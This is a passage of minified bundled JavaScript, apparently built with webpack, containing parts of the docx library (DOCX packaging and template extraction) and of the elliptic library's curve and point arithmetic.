="taiwaneseCounting",Se.IDEOGRAPH_LEGAL_TRADITIONAL="ideographLegalTraditional",Se.TAIWANESE_COUNTING_THOUSAND="taiwaneseCountingThousand",Se.TAIWANESE_DIGITAL="taiwaneseDigital",Se.CHINESE_COUNTING="chineseCounting",Se.CHINESE_LEGAL_SIMPLIFIED="chineseLegalSimplified",Se.CHINESE_COUNTING_TEN_THOUSAND="chineseCountingThousand",Se.KOREAN_DIGITAL="koreanDigital",Se.KOREAN_COUNTING="koreanCounting",Se.KOREAN_LEGAL="koreanLegal",Se.KOREAN_DIGITAL_2="koreanDigital2",Se.VIETNAMESE_COUNTING="vietnameseCounting",Se.RUSSIAN_LOWER="russianLower",Se.RUSSIAN_UPPER="russianUpper",Se.NONE="none",Se.NUMBER_IN_DASH="numberInDash",Se.HEBREW_1="hebrew1",Se.HEBREW_2="hebrew2",Se.ARABIC_ALPHA="arabicAlpha",Se.ARABIC_ABJAD="arabicAbjad",Se.HINDI_VOWELS="hindiVowels",Se.HINDI_CONSONANTS="hindiConsonants",Se.HINDI_NUMBERS="hindiNumbers",Se.HINDI_COUNTING="hindiCounting",Se.THAI_LETTERS="thaiLetters",Se.THAI_NUMBERS="thaiNumbers",Se.THAI_COUNTING="thaiCounting",Se.BAHT_TEXT="bahtText",Se.DOLLAR_TEXT="dollarText"}(O_||(O_={}));var N_=ae(6085),Br=ae(3479);class HM{format(Ce,nt={}){const Dt=Ce.prepForXml(nt);if(Dt)return Dt;throw Error("XMLComponent did not format correctly")}}class sh{replace(Ce,nt,Dt){let di=Ce;return nt.forEach((pi,Hi)=>{di=di.replace(new RegExp(`{${pi.fileName}}`,"g"),(Dt+Hi).toString())}),di}getMediaData(Ce,nt){return nt.Array.filter(Dt=>Ce.search(`{${Dt.fileName}}`)>0)}}class _s{replace(Ce,nt){let Dt=Ce;for(const di of nt)Dt=Dt.replace(new RegExp(`{${di.reference}-${di.instance}}`,"g"),di.numId.toString());return Dt}}var ch,Cl=function(Se,Ce,nt,Dt){return new(nt||(nt=Promise))(function(di,pi){function Hi(ca){try{Ya(Dt.next(ca))}catch(ka){pi(ka)}}function _a(ca){try{Ya(Dt.throw(ca))}catch(ka){pi(ka)}}function Ya(ca){var ka;ca.done?di(ca.value):(ka=ca.value,ka instanceof nt?ka:new nt(function(Dr){Dr(ka)})).then(Hi,_a)}Ya((Dt=Dt.apply(Se,Ce||[])).next())})};!function(Se){Se.NONE="",Se.WITH_2_BLANKS="  ",Se.WITH_4_BLANKS="    ",Se.WITH_TAB="\t"}(ch||(ch={}));class L_{static toString(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"string",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBuffer(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"nodebuffer",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBase64String(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"base64",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toBlob(Ce,nt){return Cl(this,void 0,void 0,function*(){return yield this.compiler.compile(Ce,nt).generateAsync({type:"blob",mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})})}static toStream(Ce,nt){return this.compiler.compile(Ce,nt).generateNodeStream({type:"nodebuffer",streamFiles:!0,mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})}}L_.compiler=new class{constructor(){this.formatter=new HM,this.imageReplacer=new sh,this.numberingReplacer=new _s}compile(Se,Ce){const nt=new N_,Dt=this.xmlifyFile(Se,Ce),di=new Map(Object.entries(Dt));for(const[,pi]of di)if(Array.isArray(pi))for(const Hi of pi)nt.file(Hi.path,Hi.data);else nt.file(pi.path,pi.data);for(const pi of Se.Media.Array)nt.file(`word/media/${pi.fileName}`,pi.stream);return nt}xmlifyFile(Se,Ce){const nt=Se.Document.Relationships.RelationshipCount+1,Dt=Br(this.formatter.format(Se.Document.View,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),di=this.imageReplacer.getMediaData(Dt,Se.Media);return{Relationships:{data:(()=>(di.forEach((pi,Hi)=>{Se.Document.Relationships.createRelationship(nt+Hi,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${pi.fileName}`)}),Br(this.formatter.format(Se.Document.Relationships,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}})))(),path:"word/_rels/document.xml.rels"},Document:{data:(()=>{const pi=this.imageReplacer.replace(Dt,di,nt);return this.numberingReplacer.replace(pi,Se.Numbering.ConcreteNumbering)})(),path:"word/document.xml"},Styles:{data:(()=>{const pi=Br(this.formatter.format(Se.Styles,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}});return this.numberingReplacer.replace(pi,Se.Numbering.ConcreteNumbering)})(),path:"word/styles.xml"},Properties:{data:Br(this.formatter.format(Se.CoreProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/core.xml"},Numbering:{data:Br(this.formatter.format(Se.Numbering,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/numbering.xml"},FileRelationships:{data:Br(this.formatter.format(Se.FileRelationships,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"_rels/.rels"},HeaderRelationships:Se.Headers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}});return this.imageReplacer.getMediaData(_a,Se.Media).forEach((Ya,ca)=>{pi.Relationships.createRelationship(ca,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ya.fileName}`)}),{data:Br(this.formatter.format(pi.Relationships,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:`word/_rels/header${Hi+1}.xml.rels`}}),FooterRelationships:Se.Footers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}});return this.imageReplacer.getMediaData(_a,Se.Media).forEach((Ya,ca)=>{pi.Relationships.createRelationship(ca,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ya.fileName}`)}),{data:Br(this.formatter.format(pi.Relationships,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:`word/_rels/footer${Hi+1}.xml.rels`}}),Headers:Se.Headers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),Ya=this.imageReplacer.getMediaData(_a,Se.Media),ca=this.imageReplacer.replace(_a,Ya,0);return{data:this.numberingReplacer.replace(ca,Se.Numbering.ConcreteNumbering),path:`word/header${Hi+1}.xml`}}),Footers:Se.Footers.map((pi,Hi)=>{const _a=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),Ya=this.imageReplacer.getMediaData(_a,Se.Media),ca=this.imageReplacer.replace(_a,Ya,0);return{data:this.numberingReplacer.replace(ca,Se.Numbering.ConcreteNumbering),path:`word/footer${Hi+1}.xml`}}),ContentTypes:{data:Br(this.formatter.format(Se.ContentTypes,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"[Content_Types].xml"},CustomProperties:{data:Br(this.formatter.format(Se.CustomProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/custom.xml"},AppProperties:{data:Br(this.formatter.format(Se.AppProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/app.xml"},FootNotes:{data:Br(this.formatter.format(Se.FootNotes.View,{viewWrapper:Se.FootNotes,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"word/footnotes.xml"},FootNotesRelationships:{data:Br(this.formatter.format(Se.FootNotes.Relationships,{viewWrapper:Se.FootNotes,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"word/_rels/footnotes.xml.rels"},Settings:{data:Br(this.formatter.format(Se.Settings,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/settings.xml"},Comments:{data:Br(this.formatter.format(Se.Comments,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/comments.xml"}}}};var fd=function(Se,Ce,nt,Dt){return new(nt||(nt=Promise))(function(di,pi){function Hi(ca){try{Ya(Dt.next(ca))}catch(ka){pi(ka)}}function _a(ca){try{Ya(Dt.throw(ca))}catch(ka){pi(ka)}}function Ya(ca){var ka;ca.done?di(ca.value):(ka=ca.value,ka instanceof nt?ka:new nt(function(Dr){Dr(ka)})).then(Hi,_a)}Ya((Dt=Dt.apply(Se,Ce||[])).next())})};const N0={"http://schemas.openxmlformats.org/officeDocument/2006/relationships/header":"header","http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer":"footer","http://schemas.openxmlformats.org/officeDocument/2006/relationships/image":"image","http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink":"hyperlink"};var lh;!function(Se){Se.HEADER="header",Se.FOOTER="footer",Se.IMAGE="image",Se.HYPERLINK="hyperlink"}(lh||(lh={}));class bC{extract(Ce){return fd(this,void 0,void 0,function*(){const nt=yield N_.loadAsync(Ce),Dt=yield nt.files["word/document.xml"].async("text"),di=yield nt.files["word/_rels/document.xml.rels"].async("text"),pi=this.extractDocumentRefs(Dt),Hi=this.findReferenceFiles(di),_a=new dd;return{headers:yield this.createHeaders(nt,pi,Hi,_a,0),footers:yield this.createFooters(nt,pi,Hi,_a,pi.headers.length),currentRelationshipId:pi.footers.length+pi.headers.length,styles:yield nt.files["word/styles.xml"].async("text"),titlePageIsDefined:this.checkIfTitlePageIsDefined(Dt),media:_a}})}createFooters(Ce,nt,Dt,di,pi){return fd(this,void 0,void 0,function*(){const Hi=nt.footers.map((_a,Ya)=>fd(this,void 0,void 0,function*(){const ca=Dt.find(At=>At.id===_a.id);if(null===ca||!ca)throw new Error(`Can not find target file for id ${_a.id}`);const ka=yield Ce.files[`word/${ca.target}`].async("text"),Dr=(0,y.xml2js)(ka,{compact:!1,captureSpacesBetweenElements:!0});if(!Dr.elements)return;const Ao=Dr.elements.reduce((At,gc)=>"w:ftr"===gc.name?gc:At),sr=M(Ao),Fc=new hl(di,pi+Ya,sr);return yield this.addRelationshipToWrapper(ca,Ce,Fc,di),{type:_a.type,footer:Fc}})).filter(_a=>!!_a);return Promise.all(Hi)})}createHeaders(Ce,nt,Dt,di,pi){return fd(this,void 0,void 0,function*(){const Hi=nt.headers.map((_a,Ya)=>fd(this,void 0,void 0,function*(){const ca=Dt.find(At=>At.id===_a.id);if(null===ca||!ca)throw new Error(`Can not find target file for id ${_a.id}`);const ka=yield Ce.files[`word/${ca.target}`].async("text"),Dr=(0,y.xml2js)(ka,{compact:!1,captureSpacesBetweenElements:!0});if(!Dr.elements)return;const Ao=Dr.elements.reduce((At,gc)=>"w:hdr"===gc.name?gc:At),sr=M(Ao),Fc=new pl(di,pi+Ya,sr);return yield this.addRelationshipToWrapper(ca,Ce,Fc,di),{type:_a.type,header:Fc}})).filter(_a=>!!_a);return Promise.all(Hi)})}addRelationshipToWrapper(Ce,nt,Dt,di){return fd(this,void 0,void 0,function*(){const pi=nt.files[`word/_rels/${Ce.target}.rels`];if(!pi)return;const Hi=yield pi.async("text"),_a=this.findReferenceFiles(Hi).filter(ca=>ca.type===lh.IMAGE),Ya=this.findReferenceFiles(Hi).filter(ca=>ca.type===lh.HYPERLINK);for(const ca of _a){const ka=N_.support.arraybuffer?"arraybuffer":"nodebuffer",Dr=yield nt.files[`word/${ca.target}`].async(ka),Ao=di.addMedia(Dr,{width:100,height:100});Dt.Relationships.createRelationship(ca.id,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ao.fileName}`)}for(const ca of Ya)Dt.Relationships.createRelationship(ca.id,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink",ca.target,ti.EXTERNAL)})}findReferenceFiles(Ce){const nt=(0,y.xml2js)(Ce,{compact:!0});return(Array.isArray(nt.Relationships.Relationship)?nt.Relationships.Relationship:[nt.Relationships.Relationship]).map(Dt=>{if(void 0===Dt._attributes)throw Error("relationship element has no attributes");return{id:this.parseRefId(Dt._attributes.Id),type:N0[Dt._attributes.Type],target:Dt._attributes.Target}}).filter(Dt=>null!==Dt.type)}extractDocumentRefs(Ce){const nt=(0,y.xml2js)(Ce,{compact:!0})["w:document"]["w:body"]["w:sectPr"],Dt=nt["w:headerReference"];let di;di=void 0===Dt?[]:Array.isArray(Dt)?Dt:[Dt];const pi=di.map(Ya=>{if(void 0===Ya._attributes)throw Error("header reference element has no attributes");return{type:Ya._attributes["w:type"],id:this.parseRefId(Ya._attributes["r:id"])}}),Hi=nt["w:footerReference"];let _a;return _a=void 0===Hi?[]:Array.isArray(Hi)?Hi:[Hi],{headers:pi,footers:_a.map(Ya=>{if(void 0===Ya._attributes)throw Error("footer reference element has no attributes");return{type:Ya._attributes["w:type"],id:this.parseRefId(Ya._attributes["r:id"])}})}}checkIfTitlePageIsDefined(Ce){return void 0!==(0,y.xml2js)(Ce,{compact:!0})["w:document"]["w:body"]["w:sectPr"]["w:titlePg"]}parseRefId(Ce){const nt=/^rId(\d+)$/.exec(Ce);if(null===nt)throw new Error("Invalid ref id");return parseInt(nt[1],10)}}var ir=ae(5575)})(),I})(),Pe.exports=$()},1875:(Pe,we,de)=>{"use strict";var ie=we;ie.version=de(193).i8,ie.utils=de(7e3),ie.rand=de(9598),ie.curve=de(6186),ie.curves=de(1915),ie.ec=de(7949),ie.eddsa=de(8593)},3654:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),$=j.getNAF,ae=j.getJSF,I=j.assert;function Q(E,g){this.type=E,this.p=new ie(g.p,16),this.red=g.prime?ie.red(g.prime):ie.mont(this.p),this.zero=new ie(0).toRed(this.red),this.one=new ie(1).toRed(this.red),this.two=new ie(2).toRed(this.red),this.n=g.n&&new ie(g.n,16),this.g=g.g&&this.pointFromJSON(g.g,g.gRed),this._wnafT1=new Array(4),this._wnafT2=new Array(4),this._wnafT3=new Array(4),this._wnafT4=new Array(4),this._bitLength=this.n?this.n.bitLength():0;var b=this.n&&this.p.div(this.n);!b||b.cmpn(100)>0?this.redN=null:(this._maxwellTrick=!0,this.redN=this.n.toRed(this.red))}function F(E,g){this.curve=E,this.type=g,this.precomputed=null}Pe.exports=Q,Q.prototype.point=function(){throw new Error("Not implemented")},Q.prototype.validate=function(){throw new Error("Not implemented")},Q.prototype._fixedNafMul=function(g,b){I(g.precomputed);var _=g._getDoubles(),y=$(b,1,this._bitLength),M=(1<<_.step+1)-(_.step%2==0?2:1);M/=3;var D,w,p=[];for(D=0;D<y.length;D+=_.step){w=0;for(var x=D+_.step-1;x>=D;x--)w=(w<<1)+y[x];p.push(w)}for(var S=this.jpoint(null,null,null),O=this.jpoint(null,null,null),U=M;U>0;U--){for(D=0;D<p.length;D++)(w=p[D])===U?O=O.mixedAdd(_.points[D]):w===-U&&(O=O.mixedAdd(_.points[D].neg()));S=S.add(O)}return S.toP()},Q.prototype._wnafMul=function(g,b){for(var _=4,y=g._getNAFPoints(_),M=y.points,p=$(b,_=y.wnd,this._bitLength),D=this.jpoint(null,null,null),w=p.length-1;w>=0;w--){for(var x=0;w>=0&&0===p[w];w--)x++;if(w>=0&&x++,D=D.dblp(x),w<0)break;var S=p[w];I(0!==S),D="affine"===g.type?D.mixedAdd(S>0?M[S-1>>1]:M[-S-1>>1].neg()):D.add(S>0?M[S-1>>1]:M[-S-1>>1].neg())}return"affine"===g.type?D.toP():D},Q.prototype._wnafMulAdd=function(g,b,_,y,M){var S,O,U,p=this._wnafT1,D=this._wnafT2,w=this._wnafT3,x=0;for(S=0;S<y;S++){var K=(U=b[S])._getNAFPoints(g);p[S]=K.wnd,D[S]=K.points}for(S=y-1;S>=1;S-=2){var ee=S-1,se=S;if(1===p[ee]&&1===p[se]){var ve=[b[ee],null,null,b[se]];0===b[ee].y.cmp(b[se].y)?(ve[1]=b[ee].add(b[se]),ve[2]=b[ee].toJ().mixedAdd(b[se].neg())):0===b[ee].y.cmp(b[se].y.redNeg())?(ve[1]=b[ee].toJ().mixedAdd(b[se]),ve[2]=b[ee].add(b[se].neg())):(ve[1]=b[ee].toJ().mixedAdd(b[se]),ve[2]=b[ee].toJ().mixedAdd(b[se].neg()));var le=[-3,-1,-5,-7,0,7,5,1,3],ye=ae(_[ee],_[se]);for(x=Math.max(ye[0].length,x),w[ee]=new Array(x),w[se]=new Array(x),O=0;O<x;O++)w[ee][O]=le[3*(1+(0|ye[0][O]))+(1+(0|ye[1][O]))],w[se][O]=0,D[ee]=ve}else w[ee]=$(_[ee],p[ee],this._bitLength),w[se]=$(_[se],p[se],this._bitLength),x=Math.max(w[ee].length,x),x=Math.max(w[se].length,x)}var f=this.jpoint(null,null,null),A=this._wnafT4;for(S=x;S>=0;S--){for(var v=0;S>=0;){var P=!0;for(O=0;O<y;O++)A[O]=0|w[O][S],0!==A[O]&&(P=!1);if(!P)break;v++,S--}if(S>=0&&v++,f=f.dblp(v),S<0)break;for(O=0;O<y;O++){var G=A[O];0!==G&&(G>0?U=D[O][G-1>>1]:G<0&&(U=D[O][-G-1>>1].neg()),f="affine"===U.type?f.mixedAdd(U):f.add(U))}}for(S=0;S<y;S++)D[S]=null;return M?f:f.toP()},Q.BasePoint=F,F.prototype.eq=function(){throw new Error("Not implemented")},F.prototype.validate=function(){return this.curve.validate(this)},Q.prototype.decodePoint=function(g,b){g=j.toArray(g,b);var _=this.p.byteLength();if((4===g[0]||6===g[0]||7===g[0])&&g.length-1==2*_)return 6===g[0]?I(g[g.length-1]%2==0):7===g[0]&&I(g[g.length-1]%2==1),this.point(g.slice(1,1+_),g.slice(1+_,1+2*_));if((2===g[0]||3===g[0])&&g.length-1===_)return this.pointFromX(g.slice(1,1+_),3===g[0]);throw new Error("Unknown point format")},F.prototype.encodeCompressed=function(g){return this.encode(g,!0)},F.prototype._encode=function(g){var b=this.curve.p.byteLength(),_=this.getX().toArray("be",b);return g?[this.getY().isEven()?2:3].concat(_):[4].concat(_,this.getY().toArray("be",b))},F.prototype.encode=function(g,b){return j.encode(this._encode(b),g)},F.prototype.precompute=function(g){if(this.precomputed)return this;var b={doubles:null,naf:null,beta:null};return b.naf=this._getNAFPoints(8),b.doubles=this._getDoubles(4,g),b.beta=this._getBeta(),this.precomputed=b,this},F.prototype._hasDoubles=function(g){if(!this.precomputed)return!1;var b=this.precomputed.doubles;return!!b&&b.points.length>=Math.ceil((g.bitLength()+1)/b.step)},F.prototype._getDoubles=function(g,b){if(this.precomputed&&this.precomputed.doubles)return this.precomputed.doubles;for(var _=[this],y=this,M=0;M<b;M+=g){for(var p=0;p<g;p++)y=y.dbl();_.push(y)}return{step:g,points:_}},F.prototype._getNAFPoints=function(g){if(this.precomputed&&this.precomputed.naf)return this.precomputed.naf;for(var b=[this],_=(1<<g)-1,y=1===_?null:this.dbl(),M=1;M<_;M++)b[M]=b[M-1].add(y);return{wnd:g,points:b}},F.prototype._getBeta=function(){return null},F.prototype.dblp=function(g){for(var b=this,_=0;_<g;_++)b=b.dbl();return b}},6718:(Pe,we,de)=>{"use strict";var ie=de(7e3),j=de(1959),$=de(2270),ae=de(3654),I=ie.assert;function Q(E){this.twisted=1!=(0|E.a),this.mOneA=this.twisted&&-1==(0|E.a),this.extended=this.mOneA,ae.call(this,"edwards",E),this.a=new j(E.a,16).umod(this.red.m),this.a=this.a.toRed(this.red),this.c=new j(E.c,16).toRed(this.red),this.c2=this.c.redSqr(),this.d=new j(E.d,16).toRed(this.red),this.dd=this.d.redAdd(this.d),I(!this.twisted||0===this.c.fromRed().cmpn(1)),this.oneC=1==(0|E.c)}function F(E,g,b,_,y){ae.BasePoint.call(this,E,"projective"),null===g&&null===b&&null===_?(this.x=this.curve.zero,this.y=this.curve.one,this.z=this.curve.one,this.t=this.curve.zero,this.zOne=!0):(this.x=new j(g,16),this.y=new j(b,16),this.z=_?new j(_,16):this.curve.one,this.t=y&&new j(y,16),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)),this.t&&!this.t.red&&(this.t=this.t.toRed(this.curve.red)),this.zOne=this.z===this.curve.one,this.curve.extended&&!this.t&&(this.t=this.x.redMul(this.y),this.zOne||(this.t=this.t.redMul(this.z.redInvm()))))}$(Q,ae),Pe.exports=Q,Q.prototype._mulA=function(g){return this.mOneA?g.redNeg():this.a.redMul(g)},Q.prototype._mulC=function(g){return this.oneC?g:this.c.redMul(g)},Q.prototype.jpoint=function(g,b,_,y){return this.point(g,b,_,y)},Q.prototype.pointFromX=function(g,b){(g=new j(g,16)).red||(g=g.toRed(this.red));var _=g.redSqr(),y=this.c2.redSub(this.a.redMul(_)),M=this.one.redSub(this.c2.redMul(this.d).redMul(_)),p=y.redMul(M.redInvm()),D=p.redSqrt();if(0!==D.redSqr().redSub(p).cmp(this.zero))throw new Error("invalid point");var w=D.fromRed().isOdd();return(b&&!w||!b&&w)&&(D=D.redNeg()),this.point(g,D)},Q.prototype.pointFromY=function(g,b){(g=new j(g,16)).red||(g=g.toRed(this.red));var _=g.redSqr(),y=_.redSub(this.c2),M=_.redMul(this.d).redMul(this.c2).redSub(this.a),p=y.redMul(M.redInvm());if(0===p.cmp(this.zero)){if(b)throw new Error("invalid point");return this.point(this.zero,g)}var D=p.redSqrt();if(0!==D.redSqr().redSub(p).cmp(this.zero))throw new Error("invalid point");return D.fromRed().isOdd()!==b&&(D=D.redNeg()),this.point(D,g)},Q.prototype.validate=function(g){if(g.isInfinity())return!0;g.normalize();var b=g.x.redSqr(),_=g.y.redSqr(),y=b.redMul(this.a).redAdd(_),M=this.c2.redMul(this.one.redAdd(this.d.redMul(b).redMul(_)));return 0===y.cmp(M)},$(F,ae.BasePoint),Q.prototype.pointFromJSON=function(g){return F.fromJSON(this,g)},Q.prototype.point=function(g,b,_,y){return new F(this,g,b,_,y)},F.fromJSON=function(g,b){return new F(g,b[0],b[1],b[2])},F.prototype.inspect=function(){return this.isInfinity()?"<EC Point Infinity>":"<EC Point x: "+this.x.fromRed().toString(16,2)+" y: "+this.y.fromRed().toString(16,2)+" z: "+this.z.fromRed().toString(16,2)+">"},F.prototype.isInfinity=function(){return 0===this.x.cmpn(0)&&(0===this.y.cmp(this.z)||this.zOne&&0===this.y.cmp(this.curve.c))},F.prototype._extDbl=function(){var g=this.x.redSqr(),b=this.y.redSqr(),_=this.z.redSqr();_=_.redIAdd(_);var y=this.curve._mulA(g),M=this.x.redAdd(this.y).redSqr().redISub(g).redISub(b),p=y.redAdd(b),D=p.redSub(_),w=y.redSub(b),x=M.redMul(D),S=p.redMul(w),O=M.redMul(w),U=D.redMul(p);return this.curve.point(x,S,U,O)},F.prototype._projDbl=function(){var y,M,p,D,w,x,g=this.x.redAdd(this.y).redSqr(),b=this.x.redSqr(),_=this.y.redSqr();if(this.curve.twisted){var S=(D=this.curve._mulA(b)).redAdd(_);this.zOne?(y=g.redSub(b).redSub(_).redMul(S.redSub(this.curve.two)),M=S.redMul(D.redSub(_)),p=S.redSqr().redSub(S).redSub(S)):(w=this.z.redSqr(),x=S.redSub(w).redISub(w),y=g.redSub(b).redISub(_).redMul(x),M=S.redMul(D.redSub(_)),p=S.redMul(x))}else D=b.redAdd(_),w=this.curve._mulC(this.z).redSqr(),x=D.redSub(w).redSub(w),y=this.curve._mulC(g.redISub(D)).redMul(x),M=this.curve._mulC(D).redMul(b.redISub(_)),p=D.redMul(x);return this.curve.point(y,M,p)},F.prototype.dbl=function(){return this.isInfinity()?this:this.curve.extended?this._extDbl():this._projDbl()},F.prototype._extAdd=function(g){var b=this.y.redSub(this.x).redMul(g.y.redSub(g.x)),_=this.y.redAdd(this.x).redMul(g.y.redAdd(g.x)),y=this.t.redMul(this.curve.dd).redMul(g.t),M=this.z.redMul(g.z.redAdd(g.z)),p=_.redSub(b),D=M.redSub(y),w=M.redAdd(y),x=_.redAdd(b),S=p.redMul(D),O=w.redMul(x),U=p.redMul(x),K=D.redMul(w);return this.curve.point(S,O,K,U)},F.prototype._projAdd=function(g){var O,U,b=this.z.redMul(g.z),_=b.redSqr(),y=this.x.redMul(g.x),M=this.y.redMul(g.y),p=this.curve.d.redMul(y).redMul(M),D=_.redSub(p),w=_.redAdd(p),x=this.x.redAdd(this.y).redMul(g.x.redAdd(g.y)).redISub(y).redISub(M),S=b.redMul(D).redMul(x);return this.curve.twisted?(O=b.redMul(w).redMul(M.redSub(this.curve._mulA(y))),U=D.redMul(w)):(O=b.redMul(w).redMul(M.redSub(y)),U=this.curve._mulC(D).redMul(w)),this.curve.point(S,O,U)},F.prototype.add=function(g){return this.isInfinity()?g:g.isInfinity()?this:this.curve.extended?this._extAdd(g):this._projAdd(g)},F.prototype.mul=function(g){return this._hasDoubles(g)?this.curve._fixedNafMul(this,g):this.curve._wnafMul(this,g)},F.prototype.mulAdd=function(g,b,_){return this.curve._wnafMulAdd(1,[this,b],[g,_],2,!1)},F.prototype.jmulAdd=function(g,b,_){return this.curve._wnafMulAdd(1,[this,b],[g,_],2,!0)},F.prototype.normalize=function(){if(this.zOne)return this;var g=this.z.redInvm();return this.x=this.x.redMul(g),this.y=this.y.redMul(g),this.t&&(this.t=this.t.redMul(g)),this.z=this.curve.one,this.zOne=!0,this},F.prototype.neg=function(){return this.curve.point(this.x.redNeg(),this.y,this.z,this.t&&this.t.redNeg())},F.prototype.getX=function(){return this.normalize(),this.x.fromRed()},F.prototype.getY=function(){return this.normalize(),this.y.fromRed()},F.prototype.eq=function(g){return this===g||0===this.getX().cmp(g.getX())&&0===this.getY().cmp(g.getY())},F.prototype.eqXToP=function(g){var b=g.toRed(this.curve.red).redMul(this.z);if(0===this.x.cmp(b))return!0;for(var _=g.clone(),y=this.curve.redN.redMul(this.z);;){if(_.iadd(this.curve.n),_.cmp(this.curve.p)>=0)return!1;if(b.redIAdd(y),0===this.x.cmp(b))return!0}},F.prototype.toP=F.prototype.normalize,F.prototype.mixedAdd=F.prototype.add},6186:(Pe,we,de)=>{"use strict";var ie=we;ie.base=de(3654),ie.short=de(396),ie.mont=de(8217),ie.edwards=de(6718)},8217:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(2270),$=de(3654),ae=de(7e3);function I(F){$.call(this,"mont",F),this.a=new ie(F.a,16).toRed(this.red),this.b=new ie(F.b,16).toRed(this.red),this.i4=new ie(4).toRed(this.red).redInvm(),this.two=new ie(2).toRed(this.red),this.a24=this.i4.redMul(this.a.redAdd(this.two))}function Q(F,E,g){$.BasePoint.call(this,F,"projective"),null===E&&null===g?(this.x=this.curve.one,this.z=this.curve.zero):(this.x=new ie(E,16),this.z=new ie(g,16),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)))}j(I,$),Pe.exports=I,I.prototype.validate=function(E){var g=E.normalize().x,b=g.redSqr(),_=b.redMul(g).redAdd(b.redMul(this.a)).redAdd(g);return 0===_.redSqrt().redSqr().cmp(_)},j(Q,$.BasePoint),I.prototype.decodePoint=function(E,g){return this.point(ae.toArray(E,g),1)},I.prototype.point=function(E,g){return new Q(this,E,g)},I.prototype.pointFromJSON=function(E){return Q.fromJSON(this,E)},Q.prototype.precompute=function(){},Q.prototype._encode=function(){return this.getX().toArray("be",this.curve.p.byteLength())},Q.fromJSON=function(E,g){return new Q(E,g[0],g[1]||E.one)},Q.prototype.inspect=function(){return this.isInfinity()?"<EC Point Infinity>":"<EC Point x: "+this.x.fromRed().toString(16,2)+" z: "+this.z.fromRed().toString(16,2)+">"},Q.prototype.isInfinity=function(){return 0===this.z.cmpn(0)},Q.prototype.dbl=function(){var g=this.x.redAdd(this.z).redSqr(),_=this.x.redSub(this.z).redSqr(),y=g.redSub(_),M=g.redMul(_),p=y.redMul(_.redAdd(this.curve.a24.redMul(y)));return this.curve.point(M,p)},Q.prototype.add=function(){throw new Error("Not supported on Montgomery curve")},Q.prototype.diffAdd=function(E,g){var b=this.x.redAdd(this.z),_=this.x.redSub(this.z),y=E.x.redAdd(E.z),p=E.x.redSub(E.z).redMul(b),D=y.redMul(_),w=g.z.redMul(p.redAdd(D).redSqr()),x=g.x.redMul(p.redISub(D).redSqr());return this.curve.point(w,x)},Q.prototype.mul=function(E){for(var g=E.clone(),b=this,_=this.curve.point(null,null),M=[];0!==g.cmpn(0);g.iushrn(1))M.push(g.andln(1));for(var p=M.length-1;p>=0;p--)0===M[p]?(b=b.diffAdd(_,this),_=_.dbl()):(_=b.diffAdd(_,this),b=b.dbl());return _},Q.prototype.mulAdd=function(){throw new Error("Not supported on Montgomery curve")},Q.prototype.jumlAdd=function(){throw new Error("Not supported on Montgomery curve")},Q.prototype.eq=function(E){return 0===this.getX().cmp(E.getX())},Q.prototype.normalize=function(){return 